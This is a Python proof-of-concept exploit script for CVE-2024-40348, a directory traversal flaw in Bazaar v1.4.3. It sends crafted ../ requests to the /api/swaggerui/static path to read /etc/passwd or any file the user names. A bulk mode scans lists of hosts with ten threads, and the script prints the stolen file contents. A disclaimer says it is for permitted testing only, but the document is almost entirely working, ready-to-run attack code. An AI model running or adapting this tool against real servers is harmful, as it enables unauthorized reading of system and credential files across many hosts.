""" POC for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This tool is based on this security research: https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md Tool By: x.com/MohamedNab1l GitHub: https://github.com/bigb0x/CVE-2024-40348 Usage: single scan: CVE-2024-40348.py -u hostname -p /etc/passwd bulk scan CVE-2024-40348 -f file.txt -p /etc/passwd Ref: https://nvd.nist.gov/vuln/detail/CVE-2024-40348 https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md Disclaimer: I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test. """ import requests import argparse import threading import queue import os from requests.exceptions import RequestException import re from datetime import datetime import urllib3 from urllib.parse import urljoin import socket import ssl # Disable SSL Warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # ANSI color codes light_gray_color = '\033[37;1m' dimmed_gray_color = '\033[90m' honey_yellow_color = "\033[38;5;214m" dim_yellow_color = "\033[33;1m" cyan_color = '\033[96m' green_color = '\033[92m' red_color = '\033[31m' light_orange_color = '\033[38;5;214m' reset_color = '\033[0m' the_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S') def banner(): print(f"""{light_orange_color} _______ ________ ___ ____ ___ __ __ __ __ ____ _____ __ __ ____ / ____/ | / / ____/ |__ \ / __ \__ \/ // / / // / / __ \__ // // / ( __ ) / / | | / / __/________/ // / / /_/ / // /_______/ // /_/ / / //_ POC for CVE-2024-40348 Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target. {dimmed_gray_color}-> x.com/MohamedNab1l. {reset_color} """) # Log directory and file LOG_DIR = 'logs' LOG_FILE = os.path.join(LOG_DIR, 'scan.log') # Function to create log directory def create_log_dir(): if not os.path.exists(LOG_DIR): os.makedirs(LOG_DIR) print_message('info', f"Log directory created: {LOG_DIR}") # Function to log messages def log_message(message): with open(LOG_FILE, 'a') as log_file: log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}\n") # Function to print messages with ANSI colors def print_message(level, message): if level == 'vulnerable': print(f"[{dimmed_gray_color}{the_time}]{honey_yellow_color} [VULN] {reset_color}{message}") if level == 'info': print(f"[{dimmed_gray_color}{the_time}]{dimmed_gray_color} [INFO] {reset_color}{message}") elif level == 'warning': print(f"[{dimmed_gray_color}[{the_time}]{green_color} [OK] {reset_color}{message}") elif level == 'error': print(f"[{light_gray_color}[{the_time}]{red_color} [ERROR] {message}{reset_color}") log_message(message) def make_request(url): try: response = requests.get(url, verify=False) if response.status_code == 200: return response.text else: return None except requests.RequestException as e: return None def send_raw_request(host, port, path): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if port == 443: context = ssl.create_default_context() sock = context.wrap_socket(sock, server_hostname=host) try: sock.connect((host, port)) request = f"GET {path} HTTP/1.1\r\n" request += f"Host: {host}:{port}\r\n" request += "Cache-Control: max-age=0\r\n" request += "Accept-Language: en-US\r\n" request += "Upgrade-Insecure-Requests: 1\r\n" request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n" request += "Accept-Encoding: gzip, deflate, br\r\n" request += "Connection: close\r\n\r\n" sock.sendall(request.encode()) response = b"" while True: data = sock.recv(4096) if not data: break response += data return response.decode('utf-8', errors='ignore') finally: sock.close() def test_host(url, file_path): try: from urllib.parse import urlparse parsed_url = urlparse(url) host = parsed_url.hostname port = parsed_url.port or (443 if parsed_url.scheme == 'https' else 80) path = f"/api/swaggerui/static/../../../../../../../../../../../../../../../../{file_path}" # print_message('info', f"Sending request to: {host}:{port}{path}") print_message('info', f"Sending request to: {host}:{port}") response = send_raw_request(host, port, path) headers, _, body = response.partition('\r\n\r\n') #print(f"Response Headers:\n{headers}") if file_path == '/etc/passwd': patterns = [ r'\w+:x:\d+:\d+:', r'root:', r'nobody:', r'/bin/bash', r'/usr/sbin/nologin' ] else: patterns = [r'\w+'] if any(re.search(pattern, body) for pattern in patterns): print_message('vulnerable', f"Vulnerable {url}") print_message('vulnerable', f"Reading {file_path}") print(f"{body[:2000]}...\n") else: print_message('warning', f"Not Vulnerable {url}") #print(f"Response Body:\n{body[:1000]}...") except Exception as e: #print_message('error', f"Error: {url} - {str(e)}") print_message('error', f"{url}") def worker(queue,file_path): while not queue.empty(): url = queue.get() print_message('info', f"Testing {url}") test_host(url,file_path) queue.task_done() def main(): banner() parser = argparse.ArgumentParser(description='POC for CVE-2024-40348 Bazaar v1.4.3 and prior. Will attempt to read /etc/passwd from target server') group = parser.add_mutually_exclusive_group(required=True) group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)') group.add_argument('-f', '--file', help='File containing list of URLs (one per line)') parser.add_argument('-p', '--path', default='/etc/passwd', help='File path to check (default: /etc/passwd)') args = parser.parse_args() create_log_dir() if args.url: print_message('info', f"Testing single target: {args.url}") test_host(args.url, args.path) elif args.file: with open(args.file, 'r') as f: urls = [line.strip() for line in f if line.strip()] print_message('info', f"Testing multiple targets from file: {args.file}") if args.path: file_path = args.path else: file_path = "/etc/passwd" url_queue = queue.Queue() for url in urls: url_queue.put(url) threads = [] for _ in range(10): t = threading.Thread(target=worker, args=(url_queue,file_path)) t.start() threads.append(t) for t in threads: t.join() print_message('info', "Scanning complete.") if __name__ == '__main__': main()